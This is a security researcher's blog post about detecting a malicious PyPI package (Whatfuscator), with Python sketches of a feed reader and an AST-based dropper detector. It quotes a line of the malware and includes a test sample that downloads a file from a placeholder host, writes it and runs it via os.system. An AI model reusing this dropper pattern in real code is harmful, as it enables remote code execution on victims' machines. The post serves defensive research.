Last Friday, I developed a small prototype to get acquainted with Go and experiment with some real-time package repository feeds to detect risky packages quickly.
Happy with my humble progress on Go programming, I started a container in the evening to collect some data over the weekend, which could help me evaluate the quality of Endor Labs’ malware detection mechanism.
So far, so good, and nothing special: these days it feels like an army of researchers and startups has set out to address software supply chain security - which of course is a great thing.
But after a quick look at the data produced overnight, I realized on Saturday morning that my program had already succeeded in finding a malicious package - after running for just a few hours.
Technically speaking, the malicious package itself is not overly interesting. The Python package Whatfuscator 70, published on Saturday 4h08 GMT, is yet another variation of the pattern used in thousands of previous attacks: Whatfuscator/__init__.py downloads a Windows executable from a hard-coded URL, saves it to a local file and starts it right after.
with open(os.path.join(os.environ["USERPROFILE"], "AppData")+"\\HV9M6B3CC.exe","wb") as f:
Several AV vendors flag HV9M6B3CC.exe as a Trojan, and a closer look at it made me realize that I had probably found another instance of the attack reported by JFrog on December 13, 2022.
Two other versions, 6.9 and 69, were published just a few minutes earlier. Apparently, between versions 69 and 70, the obfuscated Python code contained in __init__.py was moved into the Windows executable (a file created with PyInstaller). In version 69, this code uses obfuscation and compression to hide a low-level Python code object.
I reported the package to the PyPI administrators that very same morning, and it will hopefully be yanked soon. So far, according to PyPI Stats, the package has only been downloaded a few dozen times.
Malicious packages are here to stay
Far more interesting is that attackers do not seem to bother improving the initial infection logic, i.e., this Python 3-liner that downloads and runs the second-stage payload. For years, they have reused the same code snippet, sometimes adding simple encoding or encryption schemes for superficial obfuscation. The Backstabber’s Knife Collection contains hundreds of such examples, typically delivered to victim developers by creating name confusion with legitimate packages, which is one of the most-used attack vectors.
And that’s because they do not need to improve: the cost of creating and publishing such a malicious package is so marginal that a few successful infections already pay the bill. Current campaigns comprise thousands of packages, created and published automatically. In some sense, this is very similar to spam emails: sent in bulk to thousands of recipients, it suffices that a few people fall victim.
And as with spam, developers need to accept that attackers will continue publishing such malicious packages, hoping that they get past our detection mechanisms - even if only for a few hours.
Building blocks for detection mechanisms
Another takeaway, and the good news, is that it is relatively straightforward to develop detection tools for malicious packages - at least when it comes to attacks that leverage off-the-shelf code snippets, as in the case of Whatfuscator. The building blocks are all there.
Several package repositories offer news feeds to learn about new package releases being published, e.g., PyPI or Packagist. And a great number of other open source projects make it possible to analyze source and compiled code, e.g., to build abstract syntax trees, construct call graphs or track dataflows.
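To make the first building block concrete, here is a minimal Python sketch of reading such a feed. It assumes the feed is plain RSS 2.0 with one item per release; the feed URL in the comment and the sample document are illustrative assumptions, not a description of my Go prototype.

```python
import xml.etree.ElementTree as ET

# Assumption: PyPI exposes an RSS feed of the latest releases at this URL.
# Fetching is left out so the sketch runs offline, e.g.:
#   rss_xml = urllib.request.urlopen(PYPI_UPDATES_FEED).read()
PYPI_UPDATES_FEED = "https://pypi.org/rss/updates.xml"


def parse_release_feed(rss_xml):
    """Return one dict per RSS <item> with its title, link and date."""
    root = ET.fromstring(rss_xml)
    releases = []
    for item in root.iter("item"):
        releases.append({
            "title": item.findtext("title", default=""),
            "link": item.findtext("link", default=""),
            "published": item.findtext("pubDate", default=""),
        })
    return releases


# Hypothetical feed content, made up for illustration.
SAMPLE_FEED = """<rss version="2.0">
  <channel>
    <title>Example release feed</title>
    <item>
      <title>examplepkg 1.0</title>
      <link>https://pypi.org/project/examplepkg/1.0/</link>
      <pubDate>Sat, 01 Jan 2022 04:08:00 GMT</pubDate>
    </item>
  </channel>
</rss>"""

for release in parse_release_feed(SAMPLE_FEED):
    print(release["title"], release["link"])
```

Each new entry can then be handed to whatever analysis runs next, for instance downloading the release archive and inspecting its source files.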
Dataflow analysis, in particular, helps identify behavior that is commonly exhibited by malicious packages. The logic of a dropper, for example, consists of downloading an executable from an external website, often specified using a string literal, saving it to disk and executing it afterwards. Malicious packages aiming to exfiltrate secrets, in turn, collect sensitive information such as environment variables or SSH keys and upload it to external websites - again specified using string literals. Sometimes, such behavior is implemented using the programming language’s respective API, and other times via (shell) scripts executed dynamically, e.g., using script engines or operating system interfaces such as os.system in Python or ProcessBuilder in Java.
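A real dataflow analysis would track whether the downloaded bytes actually reach the file that gets executed. The sketch below swaps in something much simpler: a syntactic heuristic over Python's abstract syntax tree that only checks whether the four dropper ingredients co-occur in one file. The lists of API names are assumptions chosen for illustration and are far from exhaustive; the sample sources are only parsed, never executed.

```python
import ast

# Assumed, non-exhaustive API names (illustration only).
DOWNLOAD_CALLS = {"urlopen", "urlretrieve"}
EXECUTE_CALLS = {"system", "Popen", "startfile"}
DROPPER_INGREDIENTS = {"url_literal", "download", "file_write", "execute"}


def call_name(node):
    """Rightmost name of the called function, e.g. 'system' for os.system()."""
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    if isinstance(node.func, ast.Name):
        return node.func.id
    return ""


def opens_for_writing(node):
    """True if an open(...) call has a literal mode that allows writing."""
    mode = node.args[1] if len(node.args) >= 2 else None
    for keyword in node.keywords:
        if keyword.arg == "mode":
            mode = keyword.value
    return (isinstance(mode, ast.Constant) and isinstance(mode.value, str)
            and any(flag in mode.value for flag in "wax+"))


def dropper_indicators(source):
    """Collect which dropper ingredients appear anywhere in the source."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                found.add("url_literal")
        elif isinstance(node, ast.Call):
            name = call_name(node)
            if name in DOWNLOAD_CALLS:
                found.add("download")
            elif name in EXECUTE_CALLS:
                found.add("execute")
            elif name == "open" and opens_for_writing(node):
                found.add("file_write")
    return found


def looks_like_dropper(source):
    """Flag a file only if all four ingredients co-occur."""
    return DROPPER_INGREDIENTS <= dropper_indicators(source)


# Hypothetical samples with a placeholder URL.
SUSPICIOUS_SAMPLE = '''
import os, urllib.request
data = urllib.request.urlopen("https://example.invalid/payload.bin").read()
with open("payload.bin", "wb") as f:
    f.write(data)
os.system("payload.bin")
'''

BENIGN_SAMPLE = '''
import json
with open("config.json") as f:
    settings = json.load(f)
'''

print(looks_like_dropper(SUSPICIOUS_SAMPLE), looks_like_dropper(BENIGN_SAMPLE))
```

Because it ignores how data actually flows, a heuristic like this will flag benign installers that happen to download and launch helper tools, and it will miss anything hidden behind encoding or dynamic evaluation.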
The trick, of course, is to optimize and balance the false-positive and false-negative detection rates. In this regard, interviews conducted by Ly et al. with PyPI administrators showed that a low false-positive rate (i.e., only few benign packages are wrongly classified as malicious) is more important than a low false-negative rate (i.e., only few malicious packages are missed).
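To see why false positives weigh so heavily, it helps to put numbers on both rates. The counts in the following Python sketch are purely hypothetical and only meant to illustrate the arithmetic: because benign packages vastly outnumber malicious ones, even a small false-positive rate can produce more false alarms than true detections.

```python
def error_rates(true_pos, false_pos, true_neg, false_neg):
    """Return (false-positive rate, false-negative rate) from raw counts."""
    benign_total = false_pos + true_neg
    malicious_total = true_pos + false_neg
    fpr = false_pos / benign_total if benign_total else 0.0
    fnr = false_neg / malicious_total if malicious_total else 0.0
    return fpr, fnr


# Hypothetical counts: 10,000 benign and 20 malicious packages scanned.
true_pos, false_pos, true_neg, false_neg = 18, 50, 9950, 2

fpr, fnr = error_rates(true_pos, false_pos, true_neg, false_neg)
flagged = true_pos + false_pos

print(f"false-positive rate: {fpr:.3%}")
print(f"false-negative rate: {fnr:.1%}")
print(f"{false_pos} of {flagged} flagged packages are false alarms")
```

In this made-up scenario, the scanner misses only 2 of 20 malicious packages, yet reviewers would still have to wade through 50 wrongly flagged benign packages to confirm the 18 real ones.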
And why not “spam folders”?
But the detection mechanisms will never be perfect. Just as for spam filters, chances are that benign emails end up in your spam folder (false-positives), and that malicious emails end up in your regular inbox (false-negatives). Spinning this analogy further, one compromise could be to create a spam folder or tag that highlights whether a given package was flagged as suspicious by a malware detection mechanism. Users can decide whether to consume packages from such a folder, and project maintainers can - if they care - object to wrong classifications. Just like it happens day-in day-out for emails.
Such classifications already exist in open source ecosystems, but rather to reflect project maturity than maliciousness, e.g., Linux package repositories or Maven snapshot vs. release repositories.
Scan before publication
Today, many malicious packages are found by parties other than the package repository owners, by scanning the artifacts after they have been published. Obviously, to further reduce the exposure of developers to malicious packages, it would be advisable for public package repositories to conduct malware scans prior to publication, and to filter out malicious packages before they become available to downstream users.
Some repositories already perform security scans, but the breadth and depth of such checks vary from one ecosystem to another. Non-commercial platforms such as PyPI, for instance, have only limited resources and thus largely depend on community contributions. In the case of PyPI, only the file setup.py is checked for malicious code patterns, while all other files are not looked at. The verdicts created by the PyPI checks are reviewed on a regular basis by PyPI administrators, who remove malicious packages where necessary.
This is an opportunity for commercial vendors to create dedicated repositories containing vetted packages. Assured OSS from Google is one such example: it makes several hundred open source components that are used internally by Google, built from source and security tested, available to other software development organizations. Another example is binary repositories that run on the premises of development organizations. They mirror pre-built packages hosted by public repositories such as PyPI, which gives software development organizations the opportunity to integrate custom security workflows into the consumption process. Of course, just mirroring public repositories without any security filters or reviews does not protect against name confusion attacks (because the malicious package would be mirrored like any benign package before being downloaded to developer workstations or build systems).
However, all those third-party solutions are only effective if local developer clients are properly configured. So far, package managers like Maven and pip refer to public repositories by default, which will probably not change in the foreseeable future. Also, the setup and operation of private repositories require non-negligible effort. In other words, open-source-based software development that is secure by default requires the integration of advanced malware detection mechanisms into public repositories.
To conclude, while I am happy about my Go program and the detection capability of the components under test, what worries me more than malware variants like Whatfuscator is the prospect of more sophisticated attacks: ones that do not contain “active malicious code” like droppers or reverse shells, but alter the application logic of an existing, legitimate package, e.g., by modifying authorization checks or input sanitization.
Technically, such attacks can hardly be distinguished from accidental vulnerabilities introduced by benign developers. This makes it much easier for attackers to deny any malicious intent, and the detection of such attacks requires looking more at context information, e.g., whether a given individual already has a history of contributing to a component or project, at what time of the day or week such contributions are typically done, etc.
But seeing that startups, open source communities and regulatory bodies have woken up and are investing significant resources, I am pretty confident that we will eventually catch those as well…